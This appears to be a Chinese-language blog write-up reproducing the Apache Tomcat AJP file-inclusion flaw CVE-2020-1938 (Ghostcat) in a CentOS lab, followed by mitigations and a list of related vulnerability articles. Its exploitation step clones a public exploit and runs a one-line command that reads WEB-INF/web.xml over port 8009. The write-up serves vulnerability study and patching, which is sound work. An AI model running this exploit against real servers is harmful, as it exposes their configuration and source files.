Apache-Tomcat-Ajp(cve-2020-1938)漏洞復現

2021-12-24 LSCteam
一、漏洞描述:

Apache與Tomcat都是Apache開源組織開發的用於處理HTTP服務的項目,兩者都是免費的,都可以做為獨立的Web伺服器運行。
Apache Tomcat伺服器存在文件包含漏洞,攻擊者可利用該漏洞讀取或包含 Tomcat 上所有 webapp 目錄下的任意文件,如:webapp 配置文件或原始碼等。

二、漏洞危害:

由於Tomcat默認開啟的AJP服務。埠號為8009,攻擊者可構造惡意的請求包進行文件包含操作,進而讀取受影響Tomcat伺服器上的Web上的任意文件。

三、漏洞影響:

Apache Tomcat = 6
7 <= Apache Tomcat < 7.0.100
8 <= Apache Tomcat < 8.5.51
9 <= Apache Tomcat < 9.0.31

四、漏洞復現:

虛擬機: centos7 + apache-tomcat-8.5.32
安裝完成後使用下面的命令克隆環境
git clone https://github.com/laolisafe/CVE-2020-1938並解壓Apache
unzip apache-tomcat-8.5.32.zip


在Apache的bin目錄下,添加執行權限,我這裡給全部權限

啟動Apache,注意有先安裝java環境
sh startup.sh

查看埠,8009埠是開啟的

漏洞利用#
下載exp
git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi,我們這裡讀取WEB-INF/web.xml文件
python CNVD-2020-10487-Tomcat-Ajp-lfi.py -p 8009 -f WEB-INF/web.xml 192.168.248.129



五、解決方案:

1、臨時禁用AJP協議埠,在conf/server.xml配置文件中注釋掉2、配置ajp配置中的secretRequired跟secret屬性來限制認證。

*參考來源:網絡

PS:如果覺得本篇文章對您有所幫助,歡迎關注!幫忙點個讚,轉發一下 分享出去吧,有問題可以公眾號回復私聊小編,看到就會及時回復,也可加小編微信入群交流哦~~!

◆Burp Suite | captcha-killer 識別圖片驗證碼

◆Burp suite | chunked-coding-converter插件

◆CVE-2020-3452:Cisco_ASAFTD任意文件讀取漏洞  

相關焦點

  • Apache-Tomcat-Ajp漏洞(CVE-2020-1938)漏洞復現
    此漏洞為文件包含漏洞,攻擊者可利用該漏洞讀取或包含 Tomcat 上所有 webapp 目錄下的任意文件,如:webapp 配置文件、原始碼等。二、漏洞編號:cnvd-2020-10487cve-2020-1938三、受影響版本:apache tomcat 6apache tomcat 7 < 7.0.100apache tomcat 8 < 8.5.51apache tomcat 9 < 9.0.31已修復版本
  • 【超詳細|附EXP】Tomcat Ajp文件讀取漏洞復現(CVE-2020-1938)
    0x02 漏洞編號CNVD-2020-10487CVE-2020-19380x03 影響版本apache tomcat 6apache tomcat 7 < 7.0.100apache tomcat 8 < 8.5.51apache tomcat 9 < 9.0.310X04 環境搭建這裡是在docker裡搭建的環境1、 啟動docker
  • [漏洞預警] Apache Tomcat伺服器存在文件包含漏洞(CVE-2020-1938)
    2020年2月20日,國家信息安全漏洞共享平臺公布了Apache Tomcat伺服器存在文件包含漏洞(漏洞編號:CNVD-2020-10487/ CNNVD-202002-1052/ CVE-2020-1938)。
  • 高危漏洞|Apache Tomcat AJP協議文件包含漏洞(CNVD-2020-10487)
    漏洞背景2020年2
  • CVE2020-1938 Apache Tomcat文件包含漏洞
    漏洞介紹:2020年1月6日,國家信息安全漏洞共享平臺(CNVD) 發布了Apache Tomcat文件包含漏洞(CNVD-2020-10487,對應CVE-2020-1938)。該漏洞是因為Tomcat AJP協議存在缺陷而導致得,攻擊者可以利用該漏洞通過構造特定參數,從而讀取伺服器webapp下的任意文件。如果目標伺服器同時存在文件上傳功能,攻擊者便可進一步實現遠程代碼執行。
  • 「GhostCat」 Tomcat 文件讀取與文件包含漏洞分析(CVE-2020-1938)
    通常只要開啟了 ajp 埠就可以利用,需要注意是否為修復後的版本。Tomcat server.xml 中默認配置的 ajp 埠是 8009。 <!fofa、zoomeye 就能搜到不少,內網環境更是重災區漏洞檢測現在網上已經有很多個檢測和利用的工具了,可以使用 Ghostcat官網[1]、xray、YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi 來驗證是否存在漏洞。關於 AJP簡單來說,正常情況下我們使用的都是 HTTP 連接器去訪問的 Tomcat 伺服器。
  • 【通告更新】Apache Tomcat伺服器文件包含漏洞安全風險通告第三次更新
    近日,奇安信CERT監測到CNVD發布了漏洞公告,對應CNVD漏洞編號:CNVD-2020-10487、CVE漏洞編號:CVE-2020-1938
  • Apache Tomcat文件包含漏洞(CVE-2020-1938)安全通告
    目前,Apache官方已發布9.0.31、8.5.51及7.0.100版本對此漏洞進行修復,建議用戶儘快升級新版本。官方下載連結:http://tomcat.apache.org/download-70.cgihttp://tomcat.apache.org/download-80.cgihttp://tomcat.apache.org/download-90.cgi新華三IPS規則庫將在1.0.87版本支持對該漏洞的攔截,建議關注新華三官網及時升級版本並使能相關規則
  • Apache Tomcat文件包含漏洞分析
    更多安全資訊和分析文章請關注啟明星辰ADLab微信公眾號及官方網站(adlab.venustech.com.cn)2020年2月20日,
  • 【賊詳細 | 附PoC工具】Apache HTTPd最新RCE漏洞復現
    q=app%3A%22apache%20web%20server%202.4.49%202.4.50%220x06 漏洞復現:\pocs\20211008_web_apache-httpd_dir-traversal-rce_cve-2021-41773_cve-2021-42013.py -u  https://*.*.*.* --verify
  • CVE-2020-11107:XAMPP任意命令執行漏洞復現
    *,<7.4.40x03環境搭建● 漏洞環境:1.準備一臺裝有window系統的虛擬機,本次復現以windows10系統為例。 2.下載XAMPP,本次復現以7.2.25版本為例,下載地址:連結:https://pan.baidu.com/s/1U2w-5cIysbEIwtF9YYfOsQ 提取碼:oi88其他漏洞版本下載地址:https://sourceforge.net/projects/xampp/files/● 環境安裝和配置:
  • Tomcat 爆出高危漏洞!
    -00042020年02月20日, 360CERT 監測發現 國家信息安全漏洞共享平臺(CNVD) 收錄了 CNVD-2020-10487 Apache Tomcat文件包含漏洞。CNVD-2020-10487/CVE-2020-1938是文件包含漏洞,攻擊者可利用該高危漏洞讀取或包含 Tomcat 上所有 webapp 目錄下的任意文件,如:webapp 配置文件或原始碼等。
  • 【漏洞通告】Apache Tomcat 拒絕服務漏洞(CVE-2021-41079)
    0x00 漏洞概述CVE     IDCVE-2021-41079時
  • CVE-2020-5902: F5 BIG-IP 遠程代碼執行漏洞分析
    ,該漏洞編號為 CVE-2020-5902,漏洞等級:嚴重。0x01 漏洞詳情首先,這裡F5選擇了Apache和tomcat伺服器使用ajp_proxy模塊進行通信,apache處理完請求之後,通過ajp協議轉發給Tomcat,默認是8009埠,來看一下關於漏洞的配置文件,proxy_ajp.confProxyPassMatch ^/tmui/(.*\.jsp.*)$ ajp://localhost:8009/
  • 【漏洞預警】Apache Tomcat CVE-2018-1305安全繞過漏洞
    綜述2018年2月23日,Apache Tomcat報告了一個漏洞,該漏洞可以繞過一些安全控制,漏洞編號為CVE
  • Apache Unomi 遠程代碼執行漏洞復現(CVE-2020-13942)
    11月17號,Apache Unomi公告一起遠程代碼執行漏洞,Apache Unomi允許遠程攻擊者使用可能包含任意類的MVEL和OGNL表達式發送惡意請求,從而產生具有Unomi應用程式特權的遠程代碼執行(RCE)。
  • Apache Tomcat文件包含漏洞風險大,威脅全球約8萬臺伺服器
    CNVD(國家信息安全漏洞共享平臺)公告知名Web應用伺服器Apache Tomcat被爆存在文件包含漏洞,攻擊者可構造惡意的請求包進行文件包含操作
  • Apache 提權漏洞(CVE-2019-0211)復現
    ,並且前天在GitHub上公布出了利用腳本,這幾天我負責漏洞應急這個漏洞。本篇文章沒有叫:《Apache 提權漏洞分析》是因為我覺得 CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation 這篇文章的分析寫的挺好的,所以我沒必要再翻譯一遍了,本篇文章主要敘述復現該漏洞的過程中踩過的坑。
  • CVE-2020-2883漏洞復現
    簡介在Oracle官方發布的2020年4月關鍵補丁更新公告CPU(Critical Patch
  • Apache Tomcat CVE-2020-1938,細思極恐
    Apache Tomcat CVE-2020-1938這個漏洞確實兇猛,攻擊者可以讀取到webapp目錄下的任意文件,包括war包。